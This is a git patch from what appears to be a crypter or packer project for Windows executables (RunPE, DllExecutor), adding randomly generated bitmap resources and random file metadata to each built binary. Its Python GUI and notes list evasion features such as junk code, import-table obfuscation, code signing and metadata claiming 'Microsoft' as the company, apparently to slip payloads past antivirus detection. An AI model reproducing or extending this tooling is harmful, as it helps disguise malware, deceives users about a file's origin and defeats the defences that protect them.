From 790d030a6c38d0f8e8528d35f21111f63f10975e Mon Sep 17 00:00:00 2001 From: ALittlePatate Date: Tue, 5 Sep 2023 14:14:05 +0200 Subject: [PATCH] add: PE random resources --- DllExecutor.rc | 14 +++++++++----- config.h | 2 +- gui.py | 18 ++++++++++++++---- metadata.py | 29 +++++++++++++++++++++++++++++ 4 files changed, 53 insertions(+), 10 deletions(-) diff --git a/DllExecutor.rc b/DllExecutor.rc index 1fea2aa..e275e94 100644 --- a/DllExecutor.rc +++ b/DllExecutor.rc @@ -68,12 +68,12 @@ BEGIN BLOCK "040c04b0" BEGIN VALUE "CompanyName", "Microsoft" - VALUE "FileDescription", "qvxogvnpqxmjnhjylnrz" + VALUE "FileDescription", "ukulyvqunljimnyxqudx" VALUE "FileVersion", "1.0.0.1" - VALUE "InternalName", "xmunjmp.exe" + VALUE "InternalName", "pcqqadv.exe" VALUE "LegalCopyright", "Copyright (C) 2023" - VALUE "OriginalFilename", "qqohwcv.exe" - VALUE "ProductName", "zwmwzkm.exe" + VALUE "OriginalFilename", "ayhotiz.exe" + VALUE "ProductName", "eskjmbf.exe" VALUE "ProductVersion", "1.0.0.1" END END @@ -84,7 +84,11 @@ BEGIN END MAINICON ICON "C:/Users/patate/Desktop/Programmation/C++/Low-Level/RunPE/icon.ico" -#endif // Français (France) resources +zoixzyunsm BITMAP "img_0.bmp" +kzciawmlhq BITMAP "img_1.bmp" +nzixriywxl BITMAP "img_2.bmp" +iumfepnhqj BITMAP "img_3.bmp" +#endif ///////////////////////////////////////////////////////////////////////////// diff --git a/config.h b/config.h index afb0f83..67f9f86 100644 --- a/config.h +++ b/config.h @@ -1,2 +1,2 @@ #pragma once -#define KEY "gepjfipejnw" \ No newline at end of file +#define KEY "ouqdhoqubnco" \ No newline at end of file diff --git a/gui.py b/gui.py index fb2bb11..9151739 100644 --- a/gui.py +++ b/gui.py @@ -12,10 +12,8 @@ TODO : - LoadPE (KEKW) - Good entropy - Good Section sizes - - Add resources - Random Windows API calls (help) - - Code signing - + Done : - RunPE - Junk code @@ -23,6 +21,8 @@ Done : - IAT obfuscation (adding "normal" imports in addition to the others) - Change PE metadata (company, description, etc...) - File icon + - Code signing + - Add resources (random number of random generated bitmaps) """ from PyQt5 import QtCore, QtGui, QtWidgets @@ -31,7 +31,7 @@ from PyQt5.QtCore import QCoreApplication from PyQt5.QtGui import QPixmap from obfuscation import obfuscate from metadata import change_metadata -import os, shutil +import os, shutil, glob class Ui_mainWindow(object): def __init__(self) : @@ -203,6 +203,16 @@ class Ui_mainWindow(object): os.remove("main.cpp") os.rename("DO_NOT_TOUCH.cpp", "main.cpp") + # Find all BMP files in the directory with a wildcard pattern + bmp_files = glob.glob(os.path.join(".", "*.bmp")) + + # Delete each BMP file + for bmp_file in bmp_files: + try: + os.remove(bmp_file) + except : + pass + if not return_code : self.label_2.setText(f"--> {out_filename}") QCoreApplication.processEvents() diff --git a/metadata.py b/metadata.py index bf858f0..5e94a56 100644 --- a/metadata.py +++ b/metadata.py @@ -1,6 +1,31 @@ from randomness import * +from PIL import Image, ImageDraw +def generate_bmp(filename): + # Define the dimensions of the BMP image + width = 256 # Width of the image + height = 256 # Height of the image + + # Create a new blank image with a white background + img = Image.new('RGB', (width, height), 'white') + + # Create a drawing object to draw on the image + draw = ImageDraw.Draw(img) + + # Generate random pixel colors and fill the image + for x in range(width): + for y in range(height): + red = GetRandomRange(0, 255) + green = GetRandomRange(0, 255) + blue = GetRandomRange(0, 255) + pixel_color = (red, green, blue) + draw.point((x, y), fill=pixel_color) + + # Save the generated BMP image + img.save(filename, 'BMP') + def change_metadata(icon_file) : + number_of_bmp = GetRandomRange(2, 6) f = open("DllExecutor.rc", "r") f_c = f.readlines() f.close() @@ -24,6 +49,10 @@ def change_metadata(icon_file) : elif "MAINICON" in line and icon_file != "": line = f'MAINICON ICON "{icon_file}"\n' + for i in range(number_of_bmp) : + bmp_name = f"img_{i}.bmp" + generate_bmp(bmp_name) + line += f'{GetRandomString(10)} BITMAP "{bmp_name}"\n' o.write(line)